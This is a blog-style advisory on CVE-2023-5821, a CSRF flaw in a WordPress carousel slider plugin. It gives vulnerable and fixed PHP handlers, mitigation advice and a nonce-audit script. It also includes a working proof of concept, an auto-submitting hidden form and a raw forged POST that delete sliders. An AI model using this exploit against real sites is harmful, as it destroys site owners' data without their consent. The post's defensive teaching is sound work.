WordPress powers a huge chunk of the web, and plugins make it incredibly flexible. But with great power comes great responsibility—especially for plugin developers. A single missing security check can put entire sites at risk. One recent example is the Cross-Site Request Forgery (CSRF) vulnerability found in the Thumbnail carousel slider plugin, version 1., tracked as CVE-2023-5821.

In this post, we'll break down what happened, why it's dangerous, how it can be exploited, and what you should do about it.

What Exactly Is CVE-2023-5821?

The Thumbnail carousel slider is a WordPress plugin used to create image carousels. In version 1., a function called deleteselected is used to remove sliders via the WordPress admin dashboard.

However, this function doesn't check for a WordPress "nonce." Nonces are security tokens that help prevent CSRF attacks, where an attacker tricks a logged-in admin into performing an action they never meant to take, such as deleting all your sliders. Without a nonce check, a request that arrives carrying the admin's session cookie is indistinguishable from one the admin made deliberately: the attacker only has to get the admin's browser to send it, for example by luring the admin to a page that auto-submits a form to the site.

A CSRF attack of this kind needs two ingredients:

1. A missing or improperly implemented security token (nonce verification) on the server side.

2. An authenticated user's browser making a request they didn't explicitly intend, usually by clicking a link or visiting a page controlled by the attacker.

In our case, the vulnerable code (simplified for clarity) looks something like this:

// Vulnerable deleteselected function (simplified example)
function deleteselected() {
    // No nonce check here!
    $ids = $_POST['slider_ids'] ?? [];
    foreach($ids as $id) {
        // Delete each slider with given ID
        delete_slider_by_id($id);
    }
}

A secure function should verify the nonce before touching any data, like this:

function deleteselected() {
    // Proper nonce verification
    if (!isset($_POST['my_nonce']) || !wp_verify_nonce($_POST['my_nonce'], 'delete_slider')) {
        die('Security check failed');
    }
    $ids = $_POST['slider_ids'] ?? [];
    foreach($ids as $id) {
        delete_slider_by_id($id);
    }
}
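The snippet above shows the nonce check in isolation. Below is a fuller version of the fix, written as an added example for this post rather than taken from the plugin: it registers the handler on WordPress's AJAX hook for logged-in users, emits the nonce with wp_nonce_field on the form side, verifies it with check_ajax_referer, and adds the capability and input checks that the simplified snippet leaves out. The tcs_ prefix, the manage_options capability and the delete_slider_by_id() helper are assumptions; the action name delete_slider and the field name my_nonce are carried over from the snippet above.

```php
<?php
/*
 * Added example for this post, not the plugin's own code. The tcs_ prefix,
 * the nonce action "delete_slider", the field name "my_nonce", the
 * manage_options capability and delete_slider_by_id() are assumptions.
 */

// Form side: embed the nonce. The action string and field name must match
// what the handler verifies below.
function tcs_render_delete_form( array $slider_ids ) {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin-ajax.php' ) ) . '">';
    echo '<input type="hidden" name="action" value="deleteselected">';
    wp_nonce_field( 'delete_slider', 'my_nonce' );
    foreach ( $slider_ids as $id ) {
        printf(
            '<label><input type="checkbox" name="slider_ids[]" value="%1$d"> Slider %1$d</label>',
            absint( $id )
        );
    }
    submit_button( 'Delete selected' );
    echo '</form>';
}

// Handler side: hook only for logged-in users (no wp_ajax_nopriv_ twin),
// so anonymous requests never reach this function at all.
add_action( 'wp_ajax_deleteselected', 'tcs_handle_deleteselected' );

function tcs_handle_deleteselected() {
    // CSRF: a page on another origin cannot read Alice's nonce, so a forged
    // request fails here. check_ajax_referer() dies with HTTP 403 on failure.
    check_ajax_referer( 'delete_slider', 'my_nonce' );

    // Authorization: a valid nonce proves intent, not authority. Every
    // logged-in user, including subscribers, can obtain a nonce for their own session.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // Input validation: keep only positive integer IDs.
    $raw = isset( $_POST['slider_ids'] ) ? (array) wp_unslash( $_POST['slider_ids'] ) : array();
    $ids = array_values( array_filter( array_map( 'absint', $raw ) ) );

    if ( empty( $ids ) ) {
        wp_send_json_error( array( 'message' => 'No slider IDs supplied.' ), 400 );
    }

    foreach ( $ids as $id ) {
        delete_slider_by_id( $id ); // assumed plugin helper, as in the post
    }

    wp_send_json_success( array( 'deleted' => $ids ) ); // sends JSON and exits
}
```

The order of the checks matters: the nonce check runs first because it is the cheapest way to reject a forged request, the capability check runs second because a nonce issued to a subscriber is just as valid as one issued to an administrator, and only then is user input allowed to reach the delete routine.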

Exploitation Scenario

Let's say Alice is a WordPress admin and is logged into her site. Bob, a malicious actor, sends Alice a link to a page he controls (by email, chat, or a comment on another site). An image tag alone would not do here, because an image load is a GET request and this handler reads POST data, so Bob's page instead carries a hidden form that submits itself. When Alice opens the page, her browser sends a POST request like this to her own site without her knowledge:

<form action="https://victim-wordpress-site.com/wp-admin/admin-ajax.php?action=deleteselected" method="POST">
  <input type="hidden" name="slider_ids[]" value="1">
  <input type="hidden" name="slider_ids[]" value="2">
  <input type="submit" value="Delete All Sliders">
</form>
<script>
  // Submit as soon as the page loads; Alice never has to click anything.
  document.forms[0].submit();
</script>

Or, as the raw POST that reaches the server (the browser attaches Alice's WordPress login cookie automatically):

POST /wp-admin/admin-ajax.php?action=deleteselected HTTP/1.1
Host: victim-wordpress-site.com
Cookie: wordpress_logged_in_<hash>=<Alice's session cookie>
Content-Type: application/x-www-form-urlencoded

slider_ids[]=1&slider_ids[]=2

When Alice visits Bob's page, her browser sends this request to the vulnerable site. Since she's logged in, the action is performed _as if she had clicked delete herself_, but she never intended to. Browser SameSite cookie defaults can blunt this (Chrome treats cookies without a SameSite attribute as Lax, with a short exception for POST), but those defaults differ between browsers and are not a substitute for the nonce check.

- Any logged-in admin can be tricked into deleting multiple sliders in a single request.

- Attackers only need a crafted page or request and a way to lure the admin to it: email, chat, social media, etc.

Why Is the Nonce So Important?

A nonce ("number used once") is WordPress's CSRF token. Despite the name, a WordPress nonce is not single-use: it is a hash tied to the current user, their session token, a specific action name, and a time window (a nonce stays valid for 12 to 24 hours). Because a page on another origin cannot read it, a request that lacks the correct nonce cannot have come from the plugin's own admin form. WordPress does not enforce this automatically, though: every handler that changes data or state has to perform the check itself.

In CVE-2023-5821, the deleteselected function had no such check, so any request that arrived with an admin's cookies was accepted, whatever page had sent it.

What Should You Do?

1. Update the Plugin: install the patched release if the author has published one.
2. Disable or Remove the Plugin: if there's no fix, stop using it right away.
3. Educate Admins: remind users with admin rights to be cautious with links and emails, especially while logged in.
4. Web Application Firewalls (WAF): consider WAF rules that block requests to the vulnerable endpoint (action=deleteselected) which carry no nonce parameter or arrive with a foreign Origin or Referer header.

For Plugin Developers

- Always check nonces in actions that change data or state, and pair the nonce check with a capability check (current_user_can): a nonce proves the request came from your form, not that the user is allowed to perform the action.

- Use built-in WordPress functions like check_admin_referer, check_ajax_referer or wp_verify_nonce to verify, and wp_nonce_field or wp_create_nonce to issue the matching token.

Here's how it should look in your code:

function deleteselected() {
    // The action string must match the one passed to wp_nonce_field()
    // when the form was rendered; check_admin_referer() dies on mismatch.
    check_admin_referer('delete_slider_action');
    // proceed with deletion...
}
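To find handlers like this one before an advisory does, here is a small audit script, added for this post and not part of the plugin or of WordPress. It walks a plugin directory and reports every callback registered with add_action('wp_ajax_...') or add_action('admin_post_...') whose function body contains none of wp_verify_nonce, check_admin_referer or check_ajax_referer. It assumes handlers are registered by plain string callback name and defined as top-level functions in the same file, and it is a text heuristic rather than a parser, so treat a flag as a prompt for manual review rather than a verdict.

```php
<?php
/*
 * Added example for this post (not plugin or WordPress code): a coarse
 * static audit for AJAX/admin-post handlers without a nonce check.
 * Usage: php audit-nonces.php /path/to/plugin
 */

const NONCE_FUNCTIONS = array( 'wp_verify_nonce', 'check_admin_referer', 'check_ajax_referer' );

// Hooks whose callbacks receive state-changing requests from the admin UI.
// Captures the hook name and a plain string callback (array callbacks are skipped).
const HANDLER_HOOK_PATTERN =
    '/add_action\(\s*[\'"]((?:wp_ajax_|admin_post_)(?:nopriv_)?[\w-]+)[\'"]\s*,\s*[\'"]([\w\\\\]+)[\'"]/';

/** Return the source text of the named top-level function, or null if absent. */
function find_function_body( string $source, string $name ): ?string {
    // Strip any namespace prefix; the definition uses the short name.
    $pos   = strrpos( $name, '\\' );
    $short = ( false !== $pos ) ? substr( $name, $pos + 1 ) : $name;
    // Grab from "function name(" up to the next "function x(" or end of file.
    $pattern = '/function\s+' . preg_quote( $short, '/' ) . '\s*\(.*?(?=\bfunction\s+\w+\s*\(|\z)/s';
    return preg_match( $pattern, $source, $m ) ? $m[0] : null;
}

/** Audit one file's source; returns [hook name => status] for each handler found. */
function audit_source( string $source ): array {
    $results = array();
    if ( ! preg_match_all( HANDLER_HOOK_PATTERN, $source, $hooks, PREG_SET_ORDER ) ) {
        return $results;
    }
    foreach ( $hooks as $hook ) {
        list( , $hook_name, $callback ) = $hook;
        $body = find_function_body( $source, $callback );
        if ( null === $body ) {
            $results[ $hook_name ] = 'callback not found in this file';
            continue;
        }
        $checked = false;
        foreach ( NONCE_FUNCTIONS as $fn ) {
            if ( false !== strpos( $body, $fn ) ) {
                $checked = true;
                break;
            }
        }
        $results[ $hook_name ] = $checked ? 'ok' : 'MISSING nonce check';
    }
    return $results;
}

if ( PHP_SAPI === 'cli' && isset( $argv[1] ) ) {
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator( $argv[1], FilesystemIterator::SKIP_DOTS )
    );
    foreach ( $files as $file ) {
        if ( $file->isFile() && 'php' === $file->getExtension() ) {
            $report = audit_source( file_get_contents( $file->getPathname() ) );
            foreach ( $report as $hook => $status ) {
                printf( "%-45s %-35s %s\n", $file->getPathname(), $hook, $status );
            }
        }
    }
}
```

A handler that does call one of the nonce functions still passes even if the call sits behind a condition that never runs, and a handler whose callback is an array or closure is not inspected at all, so the script narrows the review, it does not replace it. Running it against the vulnerable deleteselected function from this post would report "MISSING nonce check" once that function is registered with add_action('wp_ajax_deleteselected', 'deleteselected').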


Conclusion

CVE-2023-5821 is a classic example of how skipping basic security best practices in plugins can endanger WordPress sites. Even a simple nonce check can save your data from being wiped out by a clever attacker. Always keep your plugins updated, review their code for common issues, and remember: Security isn’t just for the big guys. It’s for everyone.


Stay safe, keep updating, and double-check those nonces!

Timeline

Published on: 10/27/2023 12:15:00 UTC
Last modified on: 11/07/2023 04:24:00 UTC